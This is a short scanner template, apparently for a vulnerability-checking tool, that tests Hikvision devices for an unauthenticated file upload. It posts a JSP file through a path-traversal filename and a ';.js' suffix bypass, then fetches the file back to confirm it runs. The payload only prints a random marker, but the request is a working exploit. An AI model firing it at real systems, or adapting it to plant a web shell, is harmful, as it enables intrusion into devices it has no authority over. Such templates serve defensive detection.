name: hikvision-files-upload
set:
    rboundary: randomLowercase(8)
    randbody: randomLowercase(32)
    randstr: randomLowercase(10)
rules:
  - method: POST
    path: "/center/api/files;.js"
    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
    body: "\
      ------WebKitFormBoundary{{rboundary}}\r\n\
      Content-Disposition: form-data; name=\"upload\";filename=\"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{{randstr}}.jsp\"\r\n\
      Content-Type:image/jpeg\r\n\
      \r\n\
      <%out.println(\"{{randbody}}\");%>\r\n\
      ------WebKitFormBoundary{{rboundary}}--\r\n\
      "
    expression: |
      response.status == 200
  - method: GET
    path: "/clusterMgr/{{randstr}}.jsp;.js"
    expression: |
      response.status == 200 && response.body.bcontains(bytes(randbody))
    
detail:
  author: 666